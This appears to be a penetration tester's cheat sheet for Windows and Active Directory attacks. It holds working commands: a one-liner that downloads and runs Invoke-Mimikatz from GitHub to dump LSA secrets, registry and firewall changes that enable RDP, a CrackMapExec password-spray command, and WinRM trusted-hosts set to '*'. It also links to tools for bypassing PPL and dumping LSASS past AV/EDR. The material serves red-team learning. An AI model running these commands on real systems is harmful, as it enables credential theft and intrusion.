• Testing for CLM:

$ExecutionContext.SessionState.LanguageMode

• Enable RDP & Firewall:
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • netsh firewall set service type = remotedesktop mode = enable

Local Privilege Escalation:

Cheatsheet Resources:

• https://book.hacktricks.xyz/windows/windows-local-privilege-escalation

Dumping Credentials:

Bypassing PPL:

• https://github.com/itm4n/PPLdump
• https://github.com/RedCursorSecurityConsulting/PPLKiller

Dump LSASS bypassing AV/EDR

• https://github.com/outflanknl/Dumpert

Mimikatz:

• https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
  • iex (New-Object Net.Webclient).DownloadString(“https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1”)
  • Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::secrets”‘

• https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
• https://book.hacktricks.xyz/windows/active-directory-methodology
• https://github.com/infosecn1nja/AD-Attack-Defense
• https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

ACL/ACE Abuse Resources:

• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

To Review:

• http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
• https://adsecurity.org/?p=2011
• https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#unconstrained-delegation
• https://sixdub.medium.com/derivative-local-admin-cdd09445aac8
• https://exploit.ph/powerview.html
• https://exploit.ph/user-constrained-delegation.html
• https://exploit.ph/revisiting-delegate-2-thyself.html
• https://swarm.ptsecurity.com/kerberoasting-without-spns/
• https://www.aisp.sg/document/CRESTConSpeaker/Delegate_or_Escalate.pdf

Password Spraying:

• https://book.hacktricks.xyz/windows/active-directory-methodology/password-spraying
• https://github.com/Greenwolf/Spray
• MSF: use auxiliary/scanner/smb/smb_login
• CrackMapExec: crackmapexec cmd <targetfile> -u user -p pass -d domain

Relaying Credentials with ntlmrelayx:

• https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

Authenticated Vectors:

Start CMD with secondary user credentials:

• Local: runas /netonly /user:<username> cmd.exe
• Domain: runas /netonly /user:<domain>\<username> cmd.exe

Log into System:

• winrs -r:<computername> cmd.exe
• Enter-PSSession -ComputerName <computername>

Enable PowerShell Remoting

• Enable: Enable-PSRemoting –force
• Check WinRM Running: Get-WmiObject –Class win32_service | Where-Object {$_.name -like “WinRM”}
• Set all remote hosts to trusted: Set-Item WSMan:localhost\client\trustedhosts -value *
  • Verify Configuration: Get-Item WSMan:\localhost\Client\TrustedHosts

Windows Activities:

See: /index.php/2021/07/19/cheatsheet-microsoft-windows/

# username and password
$userName = 'user'
$userPassword = 'pass'

# Convert passwird to SecureString
$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force

# Create PSCredential Object
$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

Oneliner

$credObject = New-Object System.Management.Automation.PSCredential ('username', (ConvertTo-SecureString 'password' -AsPlainText -Force))

• Typical WEP & WPA is bad, WPA2 is good

Enterprise Networks:

Overview of Enterprise security, WPA modes, Enterprise network architecture and deployment guide:

• /a-crash-course-into-wpa-enterprise-security-and-deployment

Whitepaper on attacking and defending Enterprise networks:

• Whitepaper overview: //attacking-and-defending-wpa-enterprise-networks

• Whitepaper full pdf: /attacking-and-defending-wpa-enterprise-networks/attacking-and-defending-wpa-enterprise-networks.pdf

EAP Method Compatability Tables (Taken from blog post)

• Tunnelled EAP Methods

• Native EAP Methods